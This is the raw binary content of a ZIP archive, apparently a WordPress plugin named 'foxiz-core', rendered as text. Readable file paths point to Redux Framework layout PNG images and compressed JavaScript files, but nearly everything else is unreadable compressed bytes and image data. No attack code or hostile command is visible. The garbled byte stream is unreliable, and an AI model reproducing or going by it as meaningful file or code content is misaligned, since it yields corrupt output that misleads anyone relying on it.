K7B>d#[;0r&Ծ}.1,ꜿaWF͔L&{gTНi|GEy߻Z>r/sk/T?Jms=eCйrp9۩!W +sAa'd^ԈhL$(][TzyvzU~Ɉq9e.ꡣ/m0- C>;3xc ^Ag$I㵛'`Z}Tgjoc͇!As_qr/=`QPsy%T]ku;Rlv6Ooհ]m ިByqU;YӚp3ET&\qD;6tQ'a=p#s xs7eid<|?^7re*ܸA-Tڢ2p9n+J\ܔ紎:fSX0w>=^5hb|9.ktw5TPP953=T@Iϭ/3WXp2.aWu^^ _KNH>G!O -J@HYF !J {(hG R(łܞpqvȽ2bܻ& i"w\ {)#<ڭ@XF`Z{v&Pۊ=RCBSҹ~V (Xĭ0{[1 `=Ũl.5!XB)B'TScBhrakWUBԟ2{IkL,‰P}JCL`iI#ں5re>۫C4lBﭲWVOynx%uz3Fpz8zSKoOTi=GQ D4lƃ#2O66 2GLl#aŁ6[u8lS-:_XzfN7W-Ȟ Bm]{#Ct #7Rtmqeh|;~>(:pRZ tzh)N%m E-ZyNى%z͓3rQJ46~~L5I [BΝj[FN^+j,H~u>ھE/'H'ĎC=ZH3KT4 rAܨxz 4KC`:8D岹ϫ!0e;NΥ'in@75$ X*2bx#AiVb⌇-k3]Z[6&F, u DsǑɐL\;kCnq[ `H!7r$E5:Q /Ol|ܤS_$&ri6!N>@'P(\5I#0U1-"^th8Ά:dt8pٶ TL nܲ꿱{wArԑVh`sw \;NrM5AimƄ GwnK749~])2%fMɬd¢dvkr&Сl$†ʨ'Gg1 ƽ 1M͇H8q$ݴ9FH2M+Zwq^)8p[l=۾A. VPxϹq*^Nrҏ-u K|tJM$錓0ڑ'qnCs/Ij'{)yzR[ٿ\9 Xi0-"yPʷc Vc$YƊsLcՄ_\@nl.{8ha3ϷMQ< 5>`'QاO?^Xh$Ȉf%yiC9zS3$"{=!?$4'ayfÙaRJ(n+TgЋU}jTH5^j-i*hyɺm5Qq DB1f%?U+lU0̙} j( "}~Z8=%r=[G"OIn> *!UUUK7s>9??_aSy9K.1C[$!ty[$)Zw_\[vXUxg(*ɂ`5V;$|T$=SVD[˵d@F  7GrsI8Li9Z20-2vކu9c}Ghyz{QSYj 9xv9T1 Jw(BH[TJ=b}p`T_d}4.EEBN1#H4FCI;>S`HT*%h)XZۉ% &0>ly>вprMClrXMsޢSW)qmb?nh݋|GF/Mwy~. ,_I#"$I:PM?H- (WLfI}WyAbSb g"mU/Sþ\)c8>LC6UrNmQ_nZw-ok݆\N曆Ҹn/v|ݖ(tºl*.q8WPUտ:I ɾ!~i`G2Wq>tU/'$wz&))ďHVi p?ze鑗Kǩ(>F.{P_Ϫ:`p7u{sxe7V Uuho+VAc*Zci\}/j\sL@պ}B|۝v=mTKB_9 niq[]v7v;gM}z=UF|Lw/IЍMdڪDi:#-8moV:6>?nCyh.Tzk=A eVW%xAe<{`e@ì/Z[/]C|mlnTrT93Ūm6|/ICd-sA fOѓSʾybϋ-_srr ޻鷯 gtsYPKYRO O 2foxiz-core/lib/redux-framework/assets/img/1col.pngPNG  IHDR-$R pHYs   OiCCPPhotoshop ICC profilexڝSgTS=BKKoR RB&*! J!QEEȠQ, !{kּ> H3Q5 B.@ $pd!s#~<<+"x M0B\t8K@zB@F&S`cbP-`'{[! eDh;VEX0fK9-0IWfH  0Q){`##xFW<+*x<$9E[-qWW.(I+6aa@.y24x6_-"bbϫp@t~,/;m%h^ uf@Wp~<5j>{-]cK'Xto(hw?G%fIq^D$.Tʳ?D*A, `6B$BB dr`)B(Ͱ*`/@4Qhp.U=pa( Aa!ڈbX#!H$ ɈQ"K5H1RT UH=r9\F;2G1Q= C7F dt1r=6Ыhڏ>C03l0.B8, c˱" VcϱwE 6wB aAHXLXNH $4 7 Q'"K&b21XH,#/{C7$C2'ITFnR#,4H#dk9, +ȅ3![ b@qS(RjJ4e2AURݨT5ZBRQ4u9̓IKhhitݕNWGw Ljg(gwLӋT071oUX**| J&*/Tު UUT^S}FU3S ԖUPSSg;goT?~YYLOCQ_ cx,!k u5&|v*=9C3J3WRf?qtN (~))4L1e\kXHQG6EYAJ'\'GgSSݧ M=:.kDwn^Loy}/TmG X $ <5qo</QC]@Caaᄑ.ȽJtq]zۯ6iܟ4)Y3sCQ? 0k߬~OCOg#/c/Wװwa>>r><72Y_7ȷOo_C#dz%gA[z|!?:eAAA!h쐭!ΑiP~aa~ 'W?pX15wCsDDDޛg1O9-J5*>.j<74?.fYXXIlK9.*6nl {/]py.,:@LN8A*%w% yg"/6шC\*NH*Mz쑼5y$3,幄'L Lݛ:v m2=:1qB!Mggfvˬen/kY- BTZ(*geWf͉9+̳ې7ᒶKW-X潬j9(xoʿܔĹdff-[n ڴ VE/(ۻCɾUUMfeI?m]Nmq#׹=TR+Gw- 6 U#pDy  :v{vg/jBFS[b[O>zG499?rCd&ˮ/~јѡ򗓿m|x31^VwwO| (hSЧc3- cHRMz%u0`:o_FzIDATx1 Fa 0jB/]6Lm-_LQ pZL< ` 3ΈhD-ZhѢE-ZhѢE-0LTH7̂U*IENDB`PKYRlf 1foxiz-core/lib/redux-framework/assets/img/2cl.pngPNG  IHDR-$R pHYs   OiCCPPhotoshop ICC profilexڝSgTS=BKKoR RB&*! J!QEEȠQ, !{kּ> H3Q5 B.@ $pd!s#~<<+"x M0B\t8K@zB@F&S`cbP-`'{[! eDh;VEX0fK9-0IWfH  0Q){`##xFW<+*x<$9E[-qWW.(I+6aa@.y24x6_-"bbϫp@t~,/;m%h^ uf@Wp~<5j>{-]cK'Xto(hw?G%fIq^D$.Tʳ?D*A, `6B$BB dr`)B(Ͱ*`/@4Qhp.U=pa( Aa!ڈbX#!H$ ɈQ"K5H1RT UH=r9\F;2G1Q= C7F dt1r=6Ыhڏ>C03l0.B8, c˱" VcϱwE 6wB aAHXLXNH $4 7 Q'"K&b21XH,#/{C7$C2'ITFnR#,4H#dk9, +ȅ3![ b@qS(RjJ4e2AURݨT5ZBRQ4u9̓IKhhitݕNWGw Ljg(gwLӋT071oUX**| J&*/Tު UUT^S}FU3S ԖUPSSg;goT?~YYLOCQ_ cx,!k u5&|v*=9C3J3WRf?qtN (~))4L1e\kXHQG6EYAJ'\'GgSSݧ M=:.kDwn^Loy}/TmG X $ <5qo</QC]@Caaᄑ.ȽJtq]zۯ6iܟ4)Y3sCQ? 0k߬~OCOg#/c/Wװwa>>r><72Y_7ȷOo_C#dz%gA[z|!?:eAAA!h쐭!ΑiP~aa~ 'W?pX15wCsDDDޛg1O9-J5*>.j<74?.fYXXIlK9.*6nl {/]py.,:@LN8A*%w% yg"/6шC\*NH*Mz쑼5y$3,幄'L Lݛ:v m2=:1qB!Mggfvˬen/kY- BTZ(*geWf͉9+̳ې7ᒶKW-X潬j9(xoʿܔĹdff-[n ڴ VE/(ۻCɾUUMfeI?m]Nmq#׹=TR+Gw- 6 U#pDy  :v{vg/jBFS[b[O>zG499?rCd&ˮ/~јѡ򗓿m|x31^VwwO| (hSЧc3- cHRMz%u0`:o_FIDATxٽ 06E,b']{'^kAAHN)|rp!Ido1y L4&)~U߫eHx/y/;=L@ ܡps Te``j/B -B -B -B -߱ t{%6$jOpXx7K7Q Ur TǠm" T/,k5e4ߐ˒b"q̺hS=ԉM"KȇH#i}eH+g/սSm^;|g5u/D[~tt{eOK+~|]ӓ=rKy>Ơ8ꭜ]  H3Q5 B.@ $pd!s#~<<+"x M0B\t8K@zB@F&S`cbP-`'{[! eDh;VEX0fK9-0IWfH  0Q){`##xFW<+*x<$9E[-qWW.(I+6aa@.y24x6_-"bbϫp@t~,/;m%h^ uf@Wp~<5j>{-]cK'Xto(hw?G%fIq^D$.Tʳ?D*A, `6B$BB dr`)B(Ͱ*`/@4Qhp.U=pa( Aa!ڈbX#!H$ ɈQ"K5H1RT UH=r9\F;2G1Q= C7F dt1r=6Ыhڏ>C03l0.B8, c˱" VcϱwE 6wB aAHXLXNH $4 7 Q'"K&b21XH,#/{C7$C2'ITFnR#,4H#dk9, +ȅ3![ b@qS(RjJ4e2AURݨT5ZBRQ4u9̓IKhhitݕNWGw Ljg(gwLӋT071oUX**| J&*/Tު UUT^S}FU3S ԖUPSSg;goT?~YYLOCQ_ cx,!k u5&|v*=9C3J3WRf?qtN (~))4L1e\kXHQG6EYAJ'\'GgSSݧ M=:.kDwn^Loy}/TmG X $ <5qo</QC]@Caaᄑ.ȽJtq]zۯ6iܟ4)Y3sCQ? 0k߬~OCOg#/c/Wװwa>>r><72Y_7ȷOo_C#dz%gA[z|!?:eAAA!h쐭!ΑiP~aa~ 'W?pX15wCsDDDޛg1O9-J5*>.j<74?.fYXXIlK9.*6nl {/]py.,:@LN8A*%w% yg"/6шC\*NH*Mz쑼5y$3,幄'L Lݛ:v m2=:1qB!Mggfvˬen/kY- BTZ(*geWf͉9+̳ې7ᒶKW-X潬j9(xoʿܔĹdff-[n ڴ VE/(ۻCɾUUMfeI?m]Nmq#׹=TR+Gw- 6 U#pDy  :v{vg/jBFS[b[O>zG499?rCd&ˮ/~јѡ򗓿m|x31^VwwO| (hSЧc3- cHRMz%u0`:o_FIDATx1 @cD1"X<&iHD$S]] ifݏ%ifѵH<offenf宪}Ssb6]^"]R̽OE ]w__Xa&;nB -B -B -B -B.-=:,zrA>TD8R|]|x )[!IENDB`PKYRE}w(!a@P"f'0D6p(h@_63u_ -Z[3C+K;?r!YLD)c#c1 ʪ2N|bO h{yIHD.VV>RV:|{ [RF ”"MF1L1[Te'Jx%C%_%RJ#4GcӸu:(G73%Ie%e{SC add1T4UT*TTTUzUUUoScemUkS{Q7UPWߣ~A}b}9Հ5L5"5iјi<9Ъ:5MvhWh~Tfz1U.椎NTgNΌ|ݵͺHz,T NI}mPw ,tӆF -5j4oL50^l\k|g24mr6u0M713fͱBZA EEŰ%2res+}VV(٬Ԗk[c{Îjgʮ=~mCNNb&q'}d]N,:+Uʺuv^|o]5˟[7wM׍mȝ}CǃQSϓY9eu빷ػ{^>*}7l6 8`k`f 7!p2)hEPW0%8*:Qi8# z<ἶ0-AQ#p5#m"GvGѢG.7xt~g|LbLCtOlyPU܊|BLB}&:$%Zh`EꋲJO$O&&N~ rRSvLrgIsKۖ6^>!` /22fLge̜͊j&d'g* 3]9Z99"3Qhh'\(wanLHyy5yoc( z.ٴdloaqu.Yf WB+SVv[UjtCkHk2zmWbuj.Y￾HH\4uލ6W|ĺ})76T}39usocٞ---zl=TX|d[ fEqūI/WWA!1TRվS疝ӫox4صin={j-n`[k k+x\S-ۆzEjpjh8qn6Ik:8w7ޜw[nn?uݼ3V/~ڟM~nr:53(ѽȳ_ry?ZrL{퓓~מ.x:LlfW_w=7~oLM˃_uNO=|zfڛCoYož_Cggg` pHYs  IDATX XN1E 8 Ф@)Z:>wA $^f7&'ώ'C/[,;òY8zgUEqlV)ˉŤCp/q={*6s3l;9s.|~J!g~$}b8rcn=?Lj/9^Q a"zqx lt<9&}1g@&qp4t\4ވNGȯGĜtR;#d9I[vFȲsI판e#$me!NGIN3UpR"6q y&pSmkTjZ`oa#h+~/h$Dv|D#v˹m3vݫFV+~̐h]K.39=?ʟ^yHCIENDB`PKYRU` 1foxiz-core/lib/redux-framework/assets/img/3cm.pngPNG  IHDR-$R pHYs   OiCCPPhotoshop ICC profilexڝSgTS=BKKoR RB&*! J!QEEȠQ, !{kּ> H3Q5 B.@ $pd!s#~<<+"x M0B\t8K@zB@F&S`cbP-`'{[! eDh;VEX0fK9-0IWfH  0Q){`##xFW<+*x<$9E[-qWW.(I+6aa@.y24x6_-"bbϫp@t~,/;m%h^ uf@Wp~<5j>{-]cK'Xto(hw?G%fIq^D$.Tʳ?D*A, `6B$BB dr`)B(Ͱ*`/@4Qhp.U=pa( Aa!ڈbX#!H$ ɈQ"K5H1RT UH=r9\F;2G1Q= C7F dt1r=6Ыhڏ>C03l0.B8, c˱" VcϱwE 6wB aAHXLXNH $4 7 Q'"K&b21XH,#/{C7$C2'ITFnR#,4H#dk9, +ȅ3![ b@qS(RjJ4e2AURݨT5ZBRQ4u9̓IKhhitݕNWGw Ljg(gwLӋT071oUX**| J&*/Tު UUT^S}FU3S ԖUPSSg;goT?~YYLOCQ_ cx,!k u5&|v*=9C3J3WRf?qtN (~))4L1e\kXHQG6EYAJ'\'GgSSݧ M=:.kDwn^Loy}/TmG X $ <5qo</QC]@Caaᄑ.ȽJtq]zۯ6iܟ4)Y3sCQ? 0k߬~OCOg#/c/Wװwa>>r><72Y_7ȷOo_C#dz%gA[z|!?:eAAA!h쐭!ΑiP~aa~ 'W?pX15wCsDDDޛg1O9-J5*>.j<74?.fYXXIlK9.*6nl {/]py.,:@LN8A*%w% yg"/6шC\*NH*Mz쑼5y$3,幄'L Lݛ:v m2=:1qB!Mggfvˬen/kY- BTZ(*geWf͉9+̳ې7ᒶKW-X潬j9(xoʿܔĹdff-[n ڴ VE/(ۻCɾUUMfeI?m]Nmq#׹=TR+Gw- 6 U#pDy  :v{vg/jBFS[b[O>zG499?rCd&ˮ/~јѡ򗓿m|x31^VwwO| (hSЧc3- cHRMz%u0`:o_FIDATxٽn0RHydeK6C taEB(Իr=S`lǞZbpmO[ek\rYY<]H.<sʢhYc'~| R"}X4wDFo`(ZъVhE+ZъVhEwʱ mi$L :/#,Ar@t0 թn Zޡ:{4VIENDB`PKYR 瞦=foxiz-core/lib/redux-framework/assets/img/3-col-portfolio.png}SMh@-=-mwӄuRSvELnhIIx/xPOB^zzSxd]E{{7+;),fdyX=)+ITB*ei 6P37aڀY*zI֑h! , Gr$p4}b0 gL[ؠi(T\T'hͅ^%9LXk lOW&vfiPY/N r!3\TH E8c9(/1A8p0hrkTb6p#c;$9!JQoZF,ttl4Z M7`9ʹw&06g8&EX9\<\e $;rƅFn F'#)6Ѫ*lk Y&4 Y. )9.t*KplHjpH_\/w%7>uh]deu-ֵsֵ$ZrYR 37BD;-q6ѺKDS7~!*k:^^e{w?nܽ޳waCgەJ;k[WORo0؝Ï;ݧ#ՇˑZݮǓT V!j?f~Bn<4}PKYRߐ 1foxiz-core/lib/redux-framework/assets/img/3cr.pngPNG  IHDR-$R pHYs   OiCCPPhotoshop ICC profilexڝSgTS=BKKoR RB&*! J!QEEȠQ, !{kּ> H3Q5 B.@ $pd!s#~<<+"x M0B\t8K@zB@F&S`cbP-`'{[! eDh;VEX0fK9-0IWfH  0Q){`##xFW<+*x<$9E[-qWW.(I+6aa@.y24x6_-"bbϫp@t~,/;m%h^ uf@Wp~<5j>{-]cK'Xto(hw?G%fIq^D$.Tʳ?D*A, `6B$BB dr`)B(Ͱ*`/@4Qhp.U=pa( Aa!ڈbX#!H$ ɈQ"K5H1RT UH=r9\F;2G1Q= C7F dt1r=6Ыhڏ>C03l0.B8, c˱" VcϱwE 6wB aAHXLXNH $4 7 Q'"K&b21XH,#/{C7$C2'ITFnR#,4H#dk9, +ȅ3![ b@qS(RjJ4e2AURݨT5ZBRQ4u9̓IKhhitݕNWGw Ljg(gwLӋT071oUX**| J&*/Tު UUT^S}FU3S ԖUPSSg;goT?~YYLOCQ_ cx,!k u5&|v*=9C3J3WRf?qtN (~))4L1e\kXHQG6EYAJ'\'GgSSݧ M=:.kDwn^Loy}/TmG X $ <5qo</QC]@Caaᄑ.ȽJtq]zۯ6iܟ4)Y3sCQ? 0k߬~OCOg#/c/Wװwa>>r><72Y_7ȷOo_C#dz%gA[z|!?:eAAA!h쐭!ΑiP~aa~ 'W?pX15wCsDDDޛg1O9-J5*>.j<74?.fYXXIlK9.*6nl {/]py.,:@LN8A*%w% yg"/6шC\*NH*Mz쑼5y$3,幄'L Lݛ:v m2=:1qB!Mggfvˬen/kY- BTZ(*geWf͉9+̳ې7ᒶKW-X潬j9(xoʿܔĹdff-[n ڴ VE/(ۻCɾUUMfeI?m]Nmq#׹=TR+Gw- 6 U#pDy  :v{vg/jBFS[b[O>zG499?rCd&ˮ/~јѡ򗓿m|x31^VwwO| (hSЧc3- cHRMz%u0`:o_FIDATxٽ@wB\h"l"Y?,j&b&)"rNs21yH&͉R $YWon^9hV`R  wQ-@Ci r" [<##?D==."_ˈpZhE+ZъVhE+ZъVSO[c$'{%t yS Dۑa :Ck< Ձ-1;`>KB3{ eYIENDB`PKYR$W =foxiz-core/lib/redux-framework/assets/img/4-col-portfolio.png}SMhA^)Ti AЊ2l _444ڨNݝuwbҨAA^<(V/^D)*^v+R\9Aj_.vgߜw(~v x%.sJMܙ}/(Ii4EM%P2A 29W\>Rw,S" ބMD1p`_!6e "r}Lv.gguYp1gp19`+=GOt׋'NEMcEwfRxӜ a.#&,V^FW1%k|~S/g $ƭ0 ^SD-̸.A~ƺ|$$GốBi(?z5@WI`]5;V! A'@{N\..ƅG_!7suV$BlW=}i; F)A<.&Xax,38S(b׵*%31l #O-zQvaXOP5o6Zz&⻏^wkI/#&\%x/@{7S މjPh͔&mry>k7=ߪB#@fs_{덱п0-LZ~%Gpˈ{YXf^+_s-T>D@קƸ-9!r[2]3BcnCs?>*ԮeD|%4` :X2 pQSLPRaeyqĘ י5Fit )CdL$o$rpӶb>4+̹F_{Яki+x.+B.{L<۩ =UHcnf<>F ^e||pyv%b:iX'%8Iߔ? rw[vITVQN^dpYI"|#\cz[2M^S0[zIJ/HHȟ- Ic#(حu[<m[QD$6!IDok]m5.]ŢEMYlSYuy*f&e }eS{W9/ V~&튆4czPqwsIU3]DQc8"xm܎fdrXt?Gy8Gvhu|Gl>i}:Y$o 21n6  LZQ*LIENDB`PKYRԞ2ff9foxiz-core/lib/redux-framework/assets/img/toggle_tabs.pngPNG  IHDR2&tEXtSoftwareAdobe ImageReadyqe<IDATx= 07GOH`%r!k;SxO,ʿ@%DqXXț7G}!]k۶_nHe'6/!DUU@S*MӘʲTJS.ܚK*Aڶ89+ߚhYz.'/{.`œG~458B@}oUt YrEQ>c/q|$=k=kXe֞Z90э+IZ`x?"yIENDB`PKkT)foxiz-core/lib/redux-framework/assets/js/PKkT/foxiz-core/lib/redux-framework/assets/js/media/PKYR&  7foxiz-core/lib/redux-framework/assets/js/media/media.jsYݏ6߿5ZN] ]A"Ŭ,"fH}y8dC777Ty ˏgGX|ewV,7"Pݰ Sc(h5ŐE֖}Lɰ7uYq 1۟-݉Zܳ5KηE\-:ᗷX,Bf?fQ*`J"ҋWf{ng;׿b>1Ksad< e *LhݸYY'i gO;"`d],"4BZA(Oaѐ,+Hf 1&\뗍Ƨ]sCQjL5Y'BuUtir^3;$]62 WRb]1nBFqWGEhVmHrQ(tYJ \lw#[XcfE.3fe %x'`N}; e:18#}FxmڐX߃0YEiMEzB^NڤM& ]g@kB /нޒwX1x0I!beak 5c,nj3J$Ѥ|̫ Qmh/:+N7¼0/S\w 'x_>%IC?*H0i<>3(VeHlah R B=D!߁& ^)\v7S&aŽT%n7[}(^2-ʲ"RnJlPCt]ڎ8]{$Px)Jq #'-s1ĀOK0/UXZGu^~F40L6 m;G'K"OakuB@[{#o{OYzG[ƕirwAVwP< Gfp*[+myr¶Xݵ>\0ZD762٧HӎlIs3=mC):J\/)-@<_>zH$+46e\#~\b U8 su|ώ#uS {83M5$8z~C K?]:[q9^ TQʬ:(ht: ?'wԧ@4)A$t$  S4\!NDL}1'$FAE?IRv`v%u \|K"U^njfX;imm6}[úvV7R2?&8TvaG !B]"y!s(Տ8oD<5uwo}ʸm&!"~/}UΙ: 0egKu: Xmcq<8QO>A<MK㲗3y pS ۳y\k9F>ߧ4[^`B3^i?)Yli-k,"{z}cs@;` lԳ,u2EdD9BVg Q4w)ž ~w5<+\L*ued4r4숯o٭FW$.? tTA:PKYR8 ;foxiz-core/lib/redux-framework/assets/js/media/media.min.jsVێ6" W+KCS,hqlMBIy;d],hҜp v*jlr uKGn"͏l ų~b. /y~*tE_!$'x{cPX&t@ܔ`qbF7+@Cgˊ o*IU~Z1CC8 P}X3cT((7rvjŐBnbRSOH~~:D= Aب:+%nt9jh/M; nމ(GBTPY 0;ЄZ8|19=<T^ҽxJR}jyIaV+ȸ#f|ٷlN̉4Y-!zOW. lJjK69íqb[B W-99uǬGgpxz= 9Fՠju ϝS|:|scUe"C L:[pӆy+PE\B/k.("F:Q.2g+/~]@C^Ih{5I`JnsYS;11ɬ$Oq/u7SϴwERb]ZA!xv:[ҟnG[sRB;DeP%DlcmYd>Վ%ĠKֹ6,VqETR XTmZ S>lm2I]붚RK#A]T|l1ٷ?0I/PKtZT04/1foxiz-core/lib/redux-framework/assets/js/redux.js}sܶ+'Jd=,gZ?$uq}5%V˘KnHs >Vﻁ͊ "N,2Ỵl QxRdk?#~i޽|̊(MF`+p /hV Oѣc>} YՎ0<)-g͈*#(<ϓqI2m%UUj%:KNG, 4 X'6vҬatu0,K]mmH:Yt1CzbBN5E.;$̡kq:X4,J4EuJTѪ~ttQmO l@5M.>3q%6OulzVXQ_E<:7Tق>]GQDK0-/l"Z 6}#ꓴf ILL0f]rݚіQKF ^9p 9=KE>Y_'CP/) "Xق%Q,5n`$A#ϧ8_EI3qyF95@PA) ZQΦ1o(d<Y9F]k<@sA\,AB۟pγ,^ */gg@yz:cAf1b1+ʪBCˮM#`jWQ峳~j>19ZОD Ѣϕ$]R–HԃR ByAAH wZ%p; [dox| ΰ@B6MPD' P D!)kxb%i2f `h`C![Z(q*͋D 8Z$GGD<~e孊sdrQ'7&CpILBUBDsWiF'*+ciկ3=:8V_ViDKdxOnұ_] \K|Bpۼc*'ppgs.,l;'_ O{AF֣3S58X4 91fX4$yĻ,= ,B!@C̒=wwE_lFgm\JFOf02zgi*aQ,cMCيL_WIA&l$YC ¶m[&zqgX(L|F6suTbGk(5rGXk!'{qAK)`?G mY)L IO2!Jg9yqc@bOϞ !!;ۇxw.@w(8`7̾h > [.q j $vx4y) TP<-51ߪJVT^;@a8Ƕȥɔl =~}S_|.xV;z ~d(A v|ؘMw/F"3-  9QWbs2\ixcD6vZ̘͖366!`BA5ۥ<3m[ ujS鵖٥*==X#׻zo afKCwށ^&MU@ C`ްFiaO0̝[  #ȯ _ V1XF$=_F*ŔD8/o~JsCU+d(X0ŭW<47MmQ!%Ϣ9>*s|۹0Pv: .MctE]\bIQ+zc!Rݘ/l6c$)N{1eYoU+v(zh PucT5`=2 ւ;~PG k 4 ˜,Ծa[G@1|{7p">@T `86( ABj' ums΁N[L$.uO Hʯ~)f&.H6PQ &@?+Z C:ujdAC󫨘-D⬥]c.t}E磗i]cc{|)ҨXM+\oNEuɀQ&;>,_tb|%g0}p1tnGeKkz>OE6XW   뒪}}/^QCX-"k!pBSz)z#Q Hn뎞L4 n[`H]e j֎s'|BrQ0E3xy(xF??nk[8Qu$LY6CS~. ?l }2x\ ^`7p\o׻ͯvigOđnB=iWG+ƑQx(jPXx"'Q4JQb([CA|OQ6v<1Gtҏ·HgC3\%u^$L`S&꘩h% }P6-Xv@nDzMc3_1Snll$`!~N ӆ;08n\{]яL' tE,lHu^?<3O=r^,rӉT4O+{eG,ĩִzkVV4m>30&`†4 Au,kӯzi2EJL ͟Tre]֋*‘SC;8oʬiuq .G;pU_-BSpU/.=ڰBZZUK:b%+;# Z缺+,Z2[_SIU/5Ol%wǩw*OJo5Ip5uLqU8֜ZԖ斐tTG~$($n~wcU古!WiWP@Y7WRlBFx3 QhD/:A 6: dn;lЩeL*LךZ7=uFlދ3\0Z/.Y;AM3e?@#;à<wuGz0(8Tl1Mov$ Q _"`*(cz)ElTӍU <KC&He^ QY#U<>1iZMs)B:Q7έ$..dTjE XRfAG%NEJN*ksMBz8(_7EPPhHRDBWf $JipSo$pLoGS4Ut< zG7LXiH׺9Xjlh~L.݋+bLGjuMγ4[k# 9nCKhXپJ~e [ w{GP]ܠzx0ȍYC&-RCV%*]޲aU`BC̭lil'[>jAT4/X3cjtxq~m <aQ"`ZՌL͔hвM~o*,fDw% g"vQ_Lũ1isַ.ZI$YAjw"ITp;Jn̔+w6$&7hY?ӄ Sk`GtS9 oM+ Z?7, r'xo>pƺU\dT)ٻfnmQ篬TR=Ső6Y Ut]@5hI~w ci^M,^ >u7j'x9l‡{Lcʸ*/,ObFwEr\@ol9nLm4a;WIZckmQJ.z KRn"ijB "ږ` Ulu} vhV Vw #͙s Lקs"8#)E\ZkZ\VM0!䰮E9VGizp3z#ql֧h R()yCoz rx.&/<0cWht *><^kTK|tbZq3YZ.qcpANV_cHS8m ՝5ou46|`uU[C|Emzbq:.E_[jFEUtn7z1m]s&6ml `' 7G{mS1m"nvmdT'h<;$iGQ~CPҸJ/JΣ^Jobڦ(K{mS1Y觛hQ3\@{<U1.Z, 9> ut1u;I9uFoHS'M1s|x>-tKlvS>-e+WgE/~[ Q۪*}WGT5}2<$Bc DA  }\y$7/KUasZMO9{6byP7 )Aя VT~K%)kKRD)G1Q¤,r%WF]SiaioµA/͹zNWhF6.ҷE%-qcyE˦F2[Uvu<)V[S._HN%Pvc=oܸY4)59ہ D Ш®9[x?^,#847\3%>:!CLCd@^2 |e9/ *VoE ba䡓O79y J4,eCm꬧bKd+8~\_SsAxCTa@'MQ||G\'*!D_)B(FKxUSJjsimh3%mz]^8\F A4- , xnz*yHX?ur^^۲W}P~)ĩBiA3;|>et_I2_-XqԎj\{8Ft;N[@蚇CǰB! ?љnG> ZK6'_1❠C|nUy[;xH+>bIs&(Y@+ڄLlD-2:hm_Tt1K4VA] $ R7+*;8Rp& He K%WJ׸g"4ᩆXA&I3QF^o%AƍD %XTD'*`Ʊ<-&eQC ]adR7vwi_D6"(ˋU6m ՟VmE\8()NEHճF\y,N~f74Bn4#SyΎm>MhwmhKg+vܫք|^xG?4~b.]1礟"L #'|qFT3zc~9zlhH4ah@d49-9-Z7 {h30aҦ?Sԉ-I8m֔8s.RˣxTޡ縸\@+HPjfrN|V=,JϩKȒ]fNUҍo^/k޲ş[(ޢ)Li:R&jqJɡ,8tХ$%%ܠ*_|4̭!J;$q5Tc PM![n)G)bmH7M0JCDeR:ZW )9_EhsDs \xh/~=RH}LLq,1!s-دyhup~I *yubF mB+DT5hkGVɰ 6|O;,USRh7YTښH}SJ߬G !cɣj!f&SxWNqJWٜ+P*%xO,PfxROǸ$v.p[B 6{Y\EjL,G9jHӏ%Wic@Tt?T+'M7"cULEŅjDt BrMJjj .:~4;+4-t,Nse_OUJ{ft^,|{Kf7 8* m|TDҊ 7g_NrtJyr-mnnZ^G)0]N`-ka\-X <': F+5끆^Ή wxwy]8:vf->@MSߚVB&0׀Rs%&o-rufTggrl|zOr]{NX < &.WT 3>d'i>m>)_ԵMO&UM&y7T-!$ ʡkF|8}rhǝJ)bL]4qtɫa@FR#fHy|h67\"awI?>>|¬U8ͧ# GM,)Y? mYN\ ~ýz܎A*#]{㍦ZӺEcgԦf{ iI3bhr Ƽ4XydGͦiJF" Gˑ'F2pifU1մnx Fc8vH~rQMabV#b A@ f`Voph4Qª \Pc|LX!?3W5(SP'UR1l^rS_|. Ɍ]1n(?8` N4PΖ[KФ}i7GU/=p/&lϪpcb3Bwh>sѼѓ;ɓcQy\BNfCn5ҹ׈^*gUXUQ?|Tcx"˘ףE KK%I|NRKgGnZS%D:['nblɞL8wZÚCz`3p W*Ϟ6İѽ'&e-ҼJI|:,[tb)o@_J&γgwgǟ֙ x[ϽA~?]m}g &KvXUWoZ1}yγe`yB# 8׌\!!<}Y:竷ANE\\qQTADD —ޖ/ܻǝa>\2QKݕ0m$Kcw[w(eZ&4\B˓i+|ڔI;/dcLbɥҔ>*A */\WJ~En4 [q|CkFθcyvuu ^80"rWłn5)6jEݡ`Q)v%njdEiD 7~AVy¥ 4aS!PF~I aR٤gޡlnMb<>5/ 4, G6&Kwo*۹,z jܨvrPuvΏ6ZƁ4_>ߚ  -u"Xh (R%xO $ѧ 6r?vK# yc=a7;P½¥#R>HppQhjjGSkBV4=P@"ׂ,q}C!(Nm pfM߯xϟM`,v#)!୻0BALR(h*s`!b%) nUƨ I,7@S8([C?<߮L TK2X(KZTVhZv 8JJ"_{$GsҜiTt[l3n!Bm}A!@9#[@Bӆ)h L4B+cW N~v( DB U0E` :-R`e9SZ+ >N0~v5O ~z=E{z>&h)>Lњ/ݮ["/]?nu[.^Gq5 tN. ➮?ͼ6 Zu(•3a >x{}:]X\NvWdnݭ>M63pA c5У^.'[!|Clm~~/Ǧ{Ft[]:,\Y7f[5f$o?!E$!)HL }j,ڴZLjTNeEVKB2u Eru0`+sA@t \{7 5&`[GeO@55SDD"|DJBK(>zey/:{}e,s::v?ѱ=}O'Mk5N>Y:W.&`s!ggh6*]T;Hs_0HAQ3/V-@Lf꘍сЧ*QxfOCÐg#L>mt-cP,:vG&*qx۵q0 =ʄ4vyȋ%)%#rR]c?2OxiinwJ ??}x~.AT /G/m(h "y@vb_㼮su}*8qUY黬 CqG/t1ýH:;\^3uِ|"Ya=A2Z0Y2X9&;_qZCLJ1f\[ Yn`Xb3{ Xs4^vߢSJ|7UIiDc0h d˒0LewH'D^n] ˅_$B j I•/Gꞔ>Í \еj{*"U= z tzSeQAqZv9PgF!~`B?^u>H=Lȩ |pWTgTx~fd>э0gI& )c6*.x3]gֵ@ e :F\h^'7a_(zz u'ڼ%PDMm<$uX!=Ⰶ^ox<8=VWUas۞Ƹf] b}QL7ěսTF@Z%P48䑞9jmcY-Uˣ/Z&˳އ1 ِrK UV}fQS3moi`>ղAA3U>1k:j-=_Mr/4`Znt,N uJFo冘R؍[bC;lpJ^M@eX+)5ڍ,!D:E "rƿ6je$9tNoCgi8=V!NkG)v/4؉X7aJ:H4~G@nQg"@k/vIW[meߕd4j0m$|ah'wETS"[)I$nFUxKuz]P8]wIoK BJd{'!Wv21 K2UL;@7!eQ1h |`J^iV납E%ۢσ\C_l>YS_ Ko;Ɨ~1A)?hh- -{ :ۜl6ƉYd 